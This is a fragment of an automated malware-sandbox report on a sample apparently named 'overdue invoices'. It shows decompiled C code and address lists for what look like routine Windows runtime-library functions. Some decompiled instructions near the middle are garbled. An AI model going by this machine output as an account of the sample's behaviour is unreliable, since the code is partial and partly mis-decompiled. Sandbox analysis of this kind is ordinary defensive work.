													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E009DF3E0(__edi,  *0xa8848c, __ax & 0x0000ffff);
														__eax =  *0xa88488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E009DF3E0(_t333, _v80, _v64);
													_t278 = _v64;
													goto L26;
												case 2:
													 *0xa88480 & 0x0000ffff = E009DF3E0(__edi,  *0xa88484,  *0xa88480 & 0x0000ffff);
													__eax =  *0xa88480 & 0x0000ffff;
													__eax = ( *0xa88480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E009DF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E009DF3E0(_t333, _v76, _v36);
														_t278 = _v36;
													}
													L26:
													_t347 = _t347 + 0xc;
													_t333 = _t333 + (_t278 >> 1) * 2 + 2;
													__eflags = _t333;
													L27:
													_push(0x3b);
													_pop(_t280);
													 *((short*)(_t333 - 2)) = _t280;
													goto L28;
												case 6:
													__ebx =  *0xa8575c;
													__eflags = __ebx - 0xa8575c;
													if(__ebx != 0xa8575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E009DF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0xa8575c;
														} while (__ebx != 0xa8575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0xa88478 & 0x0000ffff = E009DF3E0(__edi,  *0xa8847c,  *0xa88478 & 0x0000ffff);
													__eax =  *0xa88478 & 0x0000ffff;
													__eax = ( *0xa88478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E00A239F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0xa86e58 & 0x0000ffff = E009DF3E0(__edi,  *0xa86e5c,  *0xa86e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0xa86e58 & 0x0000ffff;
													__eax = ( *0xa86e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t303 = _v16;
													_t319 = _v32;
													L29:
													_t293 = _t293 + 4;
													__eflags = _t293;
													_v56 = _t293;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t303 = _t303 + 1;
									_v16 = _t303;
									__eflags = _t303 - _v48;
								} while (_t303 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t249 =  *(_v60 + _t331 * 4);
						if(_t249 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t249 * 4 +  &M009C2935))) {
							case 0:
								__ax =  *0xa88488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t319 =  &_v64;
								_v80 = E009C2E3E(0,  &_v64);
								_t289 = _t289 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0xa88480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xa88480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E009AEEF0(0xa879a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E009AEB70(__ecx, 0xa879a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t223 = _v72;
											__eflags = _t223;
											if(_t223 != 0) {
												L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t223);
											}
											_t224 = _v52;
											__eflags = _t224;
											if(_t224 != 0) {
												__eflags = _t339;
												if(_t339 < 0) {
													L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t224);
													_t224 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t299 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0xa87b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L009B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E009AEB70(__ecx, 0xa879a0);
										__eax = _v52;
										L36:
										_pop(_t332);
										_pop(_t340);
										__eflags = _v8 ^ _t343;
										_pop(_t290);
										return L009DB640(_t224, _t290, _v8 ^ _t343, _t319, _t332, _t340);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t285 = _v56;
								if(_v56 != 0) {
									_t319 =  &_v36;
									_t287 = E009C2E3E(_t285,  &_v36);
									_t299 = _v36;
									_v76 = _t287;
								}
								if(_t299 == 0) {
									goto L44;
								} else {
									_t289 = _t289 + 2 + _t299;
								}
								goto L14;
							case 6:
								__eax =  *0xa85764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0xa88478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xa88478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0xa86e58 & 0x0000ffff;
								__eax = ( *0xa86e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t331 = _t331 + 1;
								if(_t331 >= _v48) {
									goto L16;
								} else {
									_t319 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t304 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("pushfd");
					 *((intOrPtr*)(_t338 + 0x28)) =  *((intOrPtr*)(_t338 + 0x28)) + _t249;
					asm("pushfd");
					_t250 = _t249 + _t249;
					asm("daa");
					asm("pushfd");
					 *_t338 =  *_t338 + _t304;
					asm("pushfd");
					 *((intOrPtr*)(_t338 + 0x28)) =  *((intOrPtr*)(_t338 + 0x28)) + _t250;
					asm("pushfd");
					 *0x1f009c26 =  *0x1f009c26 + _t250;
					_pop(_t294);
					_t251 =  *0x9c289400;
					 *0x200a05b =  *0x200a05b + _t319;
					 *((intOrPtr*)(_t251 + _t251 + 0x9c2880)) =  *((intOrPtr*)(_t251 + _t251 + 0x9c2880)) - _t294;
					_t252 = _t251 *  *_t333;
					asm("pushfd");
					 *_t338 =  *_t338 + _t294;
					 *((intOrPtr*)(_t252 + _t252 + 0x9c284e)) =  *((intOrPtr*)(_t251 *  *_t333 + _t251 *  *_t333 + 0x9c284e)) - _t294;
					asm("daa");
					asm("pushfd");
					_pop(_t295);
					 *((intOrPtr*)(_t347 + _t295 * 2)) =  *((intOrPtr*)(_t347 + _t295 * 2)) + (_t251 *  *_t333 >> 0x20);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0xa6ff00);
					E009ED08C(_t295, _t333, _t338);
					_v44 =  *[fs:0x18];
					_t334 = 0;
					 *_a24 = 0;
					_t296 = _a12;
					__eflags = _t296;
					if(_t296 == 0) {
						_t258 = 0xc0000100;
					} else {
						_v8 = 0;
						_t341 = 0xc0000100;
						_v52 = 0xc0000100;
						_t260 = 4;
						while(1) {
							_v40 = _t260;
							__eflags = _t260;
							if(_t260 == 0) {
								break;
							}
							_t309 = _t260 * 0xc;
							_v48 = _t309;
							__eflags = _t296 -  *((intOrPtr*)(_t309 + 0x971664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t275 = E009DE5C0(_a8,  *((intOrPtr*)(_t309 + 0x971668)), _t296);
									_t347 = _t347 + 0xc;
									__eflags = _t275;
									if(__eflags == 0) {
										_t341 = E00A151BE(_t296,  *((intOrPtr*)(_v48 + 0x97166c)), _a16, _t334, _t341, __eflags, _a20, _a24);
										_v52 = _t341;
										break;
									} else {
										_t260 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t260 = _t260 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t341;
						__eflags = _t341;
						if(_t341 < 0) {
							__eflags = _t341 - 0xc0000100;
							if(_t341 == 0xc0000100) {
								_t305 = _a4;
								__eflags = _t305;
								if(_t305 != 0) {
									_v36 = _t305;
									__eflags =  *_t305 - _t334;
									if( *_t305 == _t334) {
										_t341 = 0xc0000100;
										goto L76;
									} else {
										_t322 =  *((intOrPtr*)(_v44 + 0x30));
										_t262 =  *((intOrPtr*)(_t322 + 0x10));
										__eflags =  *((intOrPtr*)(_t262 + 0x48)) - _t305;
										if( *((intOrPtr*)(_t262 + 0x48)) == _t305) {
											__eflags =  *(_t322 + 0x1c);
											if( *(_t322 + 0x1c) == 0) {
												L106:
												_t341 = E009C2AE4( &_v36, _a8, _t296, _a16, _a20, _a24);
												_v32 = _t341;
												__eflags = _t341 - 0xc0000100;
												if(_t341 != 0xc0000100) {
													goto L69;
												} else {
													_t334 = 1;
													_t305 = _v36;
													goto L75;
												}
											} else {
												_t265 = E009A6600( *(_t322 + 0x1c));
												__eflags = _t265;
												if(_t265 != 0) {
													goto L106;
												} else {
													_t305 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t341 = E009C2C50(_t305, _a8, _t296, _a16, _a20, _a24, _t334);
											L76:
											_v32 = _t341;
											goto L69;
										}
									}
									goto L108;
								} else {
									E009AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t341 = _a24;
									_t272 = E009C2AE4( &_v36, _a8, _t296, _a16, _a20, _t341);
									_v32 = _t272;
									__eflags = _t272 - 0xc0000100;
									if(_t272 == 0xc0000100) {
										_v32 = E009C2C50(_v36, _a8, _t296, _a16, _a20, _t341, 1);
									}
									_v8 = _t334;
									E009C2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t258 = _t341;
					}
					L70:
					return E009ED0D1(_t258);
				}
				L108:
			}





















































                  0x009c2584
                  0x009c2586
                  0x009c2590
                  0x009c2596
                  0x009c2597
                  0x009c2598
                  0x009c2599
                  0x009c259e
                  0x009c25a4
                  0x009c25a9
                  0x009c25ac
                  0x009c25ae
                  0x009c25b1
                  0x009c25b2
                  0x009c25b5
                  0x009c25b8
                  0x009c25bb
                  0x009c25bc
                  0x009c25bf
                  0x009c25c2
                  0x009c25c5
                  0x009c25c6
                  0x009c25cb
                  0x009c25ce
                  0x009c25d8
                  0x009c25dd
                  0x009c25de
                  0x009c25e1
                  0x009c25e3
                  0x009c25e9
                  0x009c26da
                  0x009c26da
                  0x009c26dd
                  0x009c26e2
                  0x00a05b56
                  0x00000000
                  0x009c26e8
                  0x009c26f9
                  0x009c26fb
                  0x009c26fe
                  0x009c2700
                  0x00a05b60
                  0x00000000
                  0x009c2706
                  0x009c2706
                  0x009c270a
                  0x009c270a
                  0x009c270d
                  0x009c2713
                  0x009c2716
                  0x009c2718
                  0x009c271c
                  0x009c271e
                  0x00a05b6c
                  0x00a05b6f
                  0x00a05b7f
                  0x00a05b89
                  0x00a05b8e
                  0x00a05b93
                  0x00a05b96
                  0x00a05b9c
                  0x00a05ba0
                  0x00a05ba3
                  0x00a05bab
                  0x00a05bb0
                  0x00a05bb3
                  0x00a05bb3
                  0x00a05ba3
                  0x009c2724
                  0x009c2726
                  0x009c2729
                  0x009c272c
                  0x009c279d
                  0x009c279d
                  0x009c27a0
                  0x009c27a2
                  0x00000000
                  0x009c272e
                  0x009c272e
                  0x009c2731
                  0x009c2734
                  0x009c2734
                  0x009c2736
                  0x00a05bc1
                  0x00a05bc1
                  0x00a05bc4
                  0x00000000
                  0x00a05bca
                  0x00a05bca
                  0x00a05bcd
                  0x00000000
                  0x00a05bd3
                  0x00000000
                  0x00a05bd3
                  0x00a05bcd
                  0x009c273c
                  0x009c273c
                  0x009c2742
                  0x009c2747
                  0x009c274a
                  0x009c274d
                  0x009c2750
                  0x00000000
                  0x009c2756
                  0x009c2756
                  0x00000000
                  0x009c2902
                  0x009c2908
                  0x009c290b
                  0x00000000
                  0x009c2911
                  0x009c291c
                  0x009c2921
                  0x00000000
                  0x009c2921
                  0x00000000
                  0x00000000
                  0x009c2880
                  0x009c2887
                  0x009c288c
                  0x00000000
                  0x00000000
                  0x009c2805
                  0x009c280a
                  0x009c2814
                  0x009c2816
                  0x00000000
                  0x00000000
                  0x009c281e
                  0x009c2821
                  0x009c2823
                  0x00000000
                  0x009c2829
                  0x009c2829
                  0x009c2831
                  0x009c283c
                  0x009c283e
                  0x00000000
                  0x009c283e
                  0x00000000
                  0x00000000
                  0x009c284e
                  0x009c2850
                  0x009c2851
                  0x009c2854
                  0x009c2857
                  0x009c285a
                  0x009c285c
                  0x009c285d
                  0x00000000
                  0x00000000
                  0x009c275d
                  0x009c2761
                  0x00000000
                  0x009c2767
                  0x009c276e
                  0x009c2773
                  0x009c2773
                  0x009c2776
                  0x009c2778
                  0x009c277e
                  0x009c277e
                  0x009c2781
                  0x009c2781
                  0x009c2783
                  0x009c2784
                  0x00000000
                  0x00000000
                  0x00a05bd8
                  0x00a05bde
                  0x00a05be4
                  0x00a05be6
                  0x00a05be8
                  0x00a05be9
                  0x00a05bee
                  0x00a05bf8
                  0x00a05bff
                  0x00a05c01
                  0x00a05c04
                  0x00a05c07
                  0x00a05c0b
                  0x00a05c0d
                  0x00a05c0d
                  0x00a05c15
                  0x00a05c18
                  0x00a05c1b
                  0x00a05c1b
                  0x00a05c1e
                  0x00000000
                  0x00000000
                  0x009c28c3
                  0x009c28c8
                  0x009c28d2
                  0x009c28d4
                  0x009c28d8
                  0x009c28db
                  0x00a05c26
                  0x00a05c28
                  0x00a05c2d
                  0x00a05c2d
                  0x00000000
                  0x00000000
                  0x00a05c34
                  0x00a05c36
                  0x00a05c49
                  0x00a05c4e
                  0x00a05c54
                  0x00a05c5b
                  0x00a05c5d
                  0x00a05c60
                  0x009c2788
                  0x009c2788
                  0x009c278b
                  0x009c278e
                  0x009c278e
                  0x009c278e
                  0x009c2791
                  0x00000000
                  0x00000000
                  0x009c2756
                  0x009c2750
                  0x00000000
                  0x009c2794
                  0x009c2794
                  0x009c2795
                  0x009c2798
                  0x009c2798
                  0x00000000
                  0x009c2734
                  0x009c272c
                  0x009c2700
                  0x009c25ef
                  0x009c25ef
                  0x009c25ef
                  0x009c25f2
                  0x009c25f8
                  0x00000000
                  0x00000000
                  0x009c25fe
                  0x00000000
                  0x009c28e6
                  0x009c28ec
                  0x009c28ef
                  0x009c28f5
                  0x009c28f8
                  0x009c28f8
                  0x00000000
                  0x009c28f8
                  0x00000000
                  0x00000000
                  0x009c2866
                  0x009c2866
                  0x009c2876
                  0x009c2879
                  0x00000000
                  0x00000000
                  0x009c27e0
                  0x009c27e7
                  0x009c27e9
                  0x009c27eb
                  0x00a05afd
                  0x00000000
                  0x00a05afd
                  0x00000000
                  0x00000000
                  0x009c2633
                  0x009c2638
                  0x009c263b
                  0x009c263c
                  0x009c263e
                  0x009c2640
                  0x009c2642
                  0x009c2647
                  0x009c2649
                  0x009c264e
                  0x009c2650
                  0x009c2653
                  0x009c2659
                  0x009c26a2
                  0x009c26a7
                  0x009c26ac
                  0x009c26b2
                  0x00a05b11
                  0x00a05b15
                  0x00a05b17
                  0x00000000
                  0x009c26b8
                  0x009c26b8
                  0x009c26ba
                  0x009c27a6
                  0x009c27a6
                  0x009c27a9
                  0x009c27ab
                  0x009c27b9
                  0x009c27b9
                  0x009c27be
                  0x009c27c1
                  0x009c27c3
                  0x009c27c5
                  0x009c27c7
                  0x00a05c74
                  0x00a05c79
                  0x00a05c79
                  0x009c27c7
                  0x00000000
                  0x009c26c0
                  0x009c26c0
                  0x009c26c3
                  0x009c26c6
                  0x009c26c6
                  0x009c26c9
                  0x009c26c9
                  0x00000000
                  0x009c26c9
                  0x009c26ba
                  0x009c265b
                  0x009c265b
                  0x009c265e
                  0x009c2667
                  0x009c266d
                  0x009c2677
                  0x009c267c
                  0x009c267f
                  0x009c2681
                  0x00a05b49
                  0x00a05b4e
                  0x009c27cd
                  0x009c27d0
                  0x009c27d1
                  0x009c27d2
                  0x009c27d4
                  0x009c27dd
                  0x009c2687
                  0x009c2687
                  0x009c268a
                  0x009c268b
                  0x009c268e
                  0x009c268f
                  0x009c2691
                  0x009c2696
                  0x009c2698
                  0x009c269d
                  0x009c269f
                  0x00000000
                  0x009c269f
                  0x009c2681
                  0x00000000
                  0x00000000
                  0x009c2846
                  0x00000000
                  0x00000000
                  0x009c2605
                  0x009c260a
                  0x009c260c
                  0x009c2611
                  0x009c2616
                  0x009c2619
                  0x009c2619
                  0x009c261e
                  0x00000000
                  0x009c2624
                  0x009c2627
                  0x009c2627
                  0x00000000
                  0x00000000
                  0x00a05b1f
                  0x00000000
                  0x00000000
                  0x009c2894
                  0x009c289b
                  0x009c289d
                  0x009c28a1
                  0x00a05b2b
                  0x00a05b2e
                  0x00a05b2e
                  0x009c28a7
                  0x009c28a9
                  0x00a05b04
                  0x00a05b09
                  0x00a05b09
                  0x00a05b09
                  0x00000000
                  0x00000000
                  0x00a05b35
                  0x00a05b3c
                  0x009c28fb
                  0x009c28fb
                  0x009c26cc
                  0x009c26cc
                  0x009c26d0
                  0x00000000
                  0x009c26d2
                  0x009c26d2
                  0x00000000
                  0x009c26d2
                  0x00000000
                  0x00000000
                  0x009c25fe
                  0x009c292d
                  0x009c292f
                  0x009c2930
                  0x009c2935
                  0x009c2937
                  0x009c2938
                  0x009c293b
                  0x009c293c
                  0x009c293e
                  0x009c293f
                  0x009c2940
                  0x009c2942
                  0x009c2944
                  0x009c2947
                  0x009c2948
                  0x009c294e
                  0x009c294f
                  0x009c2954
                  0x009c295a
                  0x009c2961
                  0x009c2963
                  0x009c2964
                  0x009c2966
                  0x009c296e
                  0x009c296f
                  0x009c2972
                  0x009c2978
                  0x009c2980
                  0x009c2981
                  0x009c2982
                  0x009c2983
                  0x009c2984
                  0x009c2985
                  0x009c2986
                  0x009c2987
                  0x009c2988
                  0x009c2989
                  0x009c298a
                  0x009c298b
                  0x009c298c
                  0x009c298d
                  0x009c298e
                  0x009c298f
                  0x009c2990
                  0x009c2992
                  0x009c2997
                  0x009c29a3
                  0x009c29a6
                  0x009c29ab
                  0x009c29ad
                  0x009c29b0
                  0x009c29b2
                  0x00a05c80
                  0x009c29b8
                  0x009c29b8
                  0x009c29bb
                  0x009c29c0
                  0x009c29c5
                  0x009c29c6
                  0x009c29c6
                  0x009c29c9
                  0x009c29cb
                  0x00000000
                  0x00000000
                  0x009c29cd
                  0x009c29d0
                  0x009c29d9
                  0x009c29db
                  0x009c29dd
                  0x009c2a7f
                  0x009c2a84
                  0x009c2a87
                  0x009c2a89
                  0x00a05ca1
                  0x00a05ca3
                  0x00000000
                  0x009c2a8f
                  0x009c2a8f
                  0x00000000
                  0x009c2a8f
                  0x00000000
                  0x009c29e3
                  0x009c29e3
                  0x009c29e3
                  0x00000000
                  0x009c29e3
                  0x009c29dd
                  0x00000000
                  0x009c29db
                  0x009c29e6
                  0x009c29e9
                  0x009c29eb
                  0x009c29ed
                  0x009c29f3
                  0x009c29f5
                  0x009c29f8
                  0x009c29fa
                  0x009c2a97
                  0x009c2a9a
                  0x009c2a9d
                  0x009c2add
                  0x00000000
                  0x009c2a9f
                  0x009c2aa2
                  0x009c2aa5
                  0x009c2aa8
                  0x009c2aab
                  0x00a05cab
                  0x00a05caf
                  0x00a05cc5
                  0x00a05cda
                  0x00a05cdc
                  0x00a05cdf
                  0x00a05ce5
                  0x00000000
                  0x00a05ceb
                  0x00a05ced
                  0x00a05cee
                  0x00000000
                  0x00a05cee
                  0x00a05cb1
                  0x00a05cb4
                  0x00a05cb9
                  0x00a05cbb
                  0x00000000
                  0x00a05cbd
                  0x00a05cbd
                  0x00000000
                  0x00a05cbd
                  0x00a05cbb
                  0x009c2ab1
                  0x009c2ab1
                  0x009c2ac4
                  0x009c2ac6
                  0x009c2ac6
                  0x00000000
                  0x009c2ac6
                  0x009c2aab
                  0x00000000
                  0x009c2a00
                  0x009c2a09
                  0x009c2a0e
                  0x009c2a21
                  0x009c2a24
                  0x009c2a35
                  0x009c2a3a
                  0x009c2a3d
                  0x009c2a42
                  0x009c2a59
                  0x009c2a59
                  0x009c2a5c
                  0x009c2a5f
                  0x009c2a5f
                  0x009c29fa
                  0x009c29f3
                  0x009c2a64
                  0x009c2a64
                  0x009c2a6b
                  0x009c2a6b
                  0x009c2a6d
                  0x009c2a72
                  0x009c2a72
                  0x00000000

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID: PATH
                  • API String ID: 0-1036084923
                  • Opcode ID: b0e69d14650fc78d87a6ceccb523c54167a591fc451c4cb64777a889f259572c
                  • Instruction ID: 2f44304e192e209a21eefca0ffc3b10921affd2955d319f4d918b243b5b337d9
                  • Opcode Fuzzy Hash: b0e69d14650fc78d87a6ceccb523c54167a591fc451c4cb64777a889f259572c
                  • Instruction Fuzzy Hash: A8C18E71E00219DBCB24DFA8D981FAEB7B5FF48740F54442EE401BB291EB78A941CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00992D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                  Download Yara Rule
                  C-Code - Quality: 63%
                  			E00992D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0xa85350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0xa87bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					L009D97C0();
				}
				if( *0xa879c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0xa879c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						L009C1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E009B7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E00A2FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E009D9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E009CE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L009EDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0xa86901;
								_push(_t109);
								_v52 = _t98;
								if( *0xa86901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E009D9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E009D95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E009B7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E009B7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E00A17016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E00A2FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0xa85350;
							if(_t109 != 0xa85350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									L00A2FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						L00A25720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                  0x00992d8a
                  0x00992d8a
                  0x00992d92
                  0x00992d96
                  0x00992d9e
                  0x00992da0
                  0x00992da3
                  0x00992da5
                  0x00992da8
                  0x00992dab
                  0x00992db2
                  0x009ef9aa
                  0x009ef9ab
                  0x009ef9ae
                  0x009ef9ae
                  0x00992db8
                  0x00992dc2
                  0x009ef9b9
                  0x009ef9be
                  0x009ef9bf
                  0x009ef9bf
                  0x00992dcf
                  0x009ef9c9
                  0x00992dd5
                  0x00992dd5
                  0x00992dd5
                  0x00992dde
                  0x00992de1
                  0x00992e70
                  0x00992e72
                  0x00992e72
                  0x00992de7
                  0x00992deb
                  0x00992e7c
                  0x00992e83
                  0x00992e85
                  0x00992e8b
                  0x00992e8d
                  0x00992e92
                  0x00992e92
                  0x00992e85
                  0x00992df1
                  0x00992df7
                  0x00992df9
                  0x00992df9
                  0x00992dfc
                  0x00992dff
                  0x00992e02
                  0x00000000
                  0x00992e05
                  0x00992e0c
                  0x009ef9d9
                  0x00992e12
                  0x00992e12
                  0x00992e12
                  0x00992e1a
                  0x009ef9e3
                  0x009ef9e9
                  0x009ef9f0
